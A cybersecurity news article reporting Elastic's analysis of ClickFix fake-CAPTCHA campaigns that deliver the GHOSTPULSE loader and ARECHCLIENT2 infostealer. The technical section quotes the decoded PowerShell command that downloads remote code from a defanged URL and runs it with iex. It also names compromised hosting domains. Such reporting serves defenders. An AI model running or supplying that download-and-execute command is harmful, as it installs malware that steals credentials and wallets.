Cybersecurity researchers have documented a significant surge in attacks utilizing the ClickFix social engineering technique, which has emerged as one of the most effective methods for initial access in modern cyber campaigns.

This deceptive tactic tricks users into executing malicious PowerShell commands by presenting fake browser verification prompts, CAPTCHA challenges, or system error messages that appear legitimate but actually serve as gateways for malware deployment.

The ClickFix technique first surfaced on the threat landscape in March 2024 but has experienced explosive growth throughout 2024 and continuing into 2025.

Its effectiveness stems from exploiting “verification fatigue,” where users have become conditioned to mindlessly click through security checks and verification prompts.

When confronted with familiar-looking CAPTCHA interfaces or urgent system fix notifications, victims often comply without scrutinizing the underlying malicious request, making this an incredibly potent attack vector for threat actors seeking to breach initial defenses.

Elastic analysts identified a substantial increase in ClickFix-related alerts across monitored environments, particularly within the first quarter of 2025, with attackers predominantly focusing on deploying mass infection malware including Remote Access Trojans and information stealers.

The security researchers have tracked these campaigns leading to the deployment of sophisticated malware families, including updated versions of the GHOSTPULSE loader and the increasingly prevalent ARECHCLIENT2 infostealer, which has experienced a significant resurgence in malicious activity throughout 2025.

Recent campaigns demonstrate the multi-stage nature of these attacks, beginning with ClickFix social engineering that serves as the initial compromise vector.

Once users execute the malicious commands, the attack chain deploys GHOSTPULSE as a payload loader, which then delivers an intermediate .NET loader responsible for the final payload deployment.

This sophisticated approach allows attackers to maintain persistence while evading traditional security measures through multiple execution layers designed to steal sensitive data and establish remote control over compromised systems.

The current threat landscape shows attackers leveraging compromised legitimate infrastructure to host their malicious captcha pages, making detection more challenging for both security solutions and end users.

These campaigns target a broad audience and have demonstrated remarkable success rates due to the psychological manipulation inherent in the ClickFix technique, which transforms routine user interactions into potential security compromises.

Technical Analysis of the Infection Mechanism

The infection process begins when victims encounter fraudulent web pages designed to mimic legitimate Cloudflare anti-DDoS verification systems.

These pages, hosted on compromised infrastructure including domains such as clients.dealeronlinemarketing.com and clients.contology.com, present users with convincing verification prompts instructing them to complete specific keyboard actions to prove they are human.

The malicious JavaScript embedded within these pages performs two critical functions: it queries the victim’s public IP address via api.ipify.org and subsequently copies a base64-encoded PowerShell command to the system clipboard.

The PowerShell command that victims unknowingly execute appears innocuous but contains devastating payload delivery capabilities. When decoded, the initial command reveals: (Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iex.

This command fetches additional PowerShell instructions that download and extract a ZIP file containing GHOSTPULSE components, including a legitimate executable and malicious DLL designed for DLL sideloading attacks.

The GHOSTPULSE loader represents a sophisticated evolution in malware deployment, featuring an encrypted configuration stored in external files rather than hardcoded within the binary.

The malware utilizes a multi-stage process where the initial loader decrypts configuration data from a file named Shonomteak.bxi using DWORD addition operations, extracts stage-two code, and injects it into loaded libraries such as vssapi.dll.

This approach demonstrates the attackers’ commitment to evasion, as the encrypted external configuration makes static analysis significantly more challenging while providing operational flexibility for campaign management.

The final payload, ARECHCLIENT2, operates as a comprehensive data theft platform targeting cryptocurrency wallets, browser credentials, and system information while establishing persistent command-and-control communication with hardcoded server infrastructure.

The malware’s obfuscated .NET architecture includes AMSI bypassing capabilities and reflective loading techniques that enable it to operate entirely in memory, avoiding detection by traditional file-based security solutions and demonstrating the sophisticated technical capabilities deployed in modern ClickFix campaigns.

Power up early threat detection, escalation, and mitigation with ANY.RUN’s Threat Intelligence Lookup. Get 50 trial searches.

The post Hackers Using ClickFix Technique to Deploy Remote Access Trojans and Data-Stealing Malware appeared first on Cyber Security News.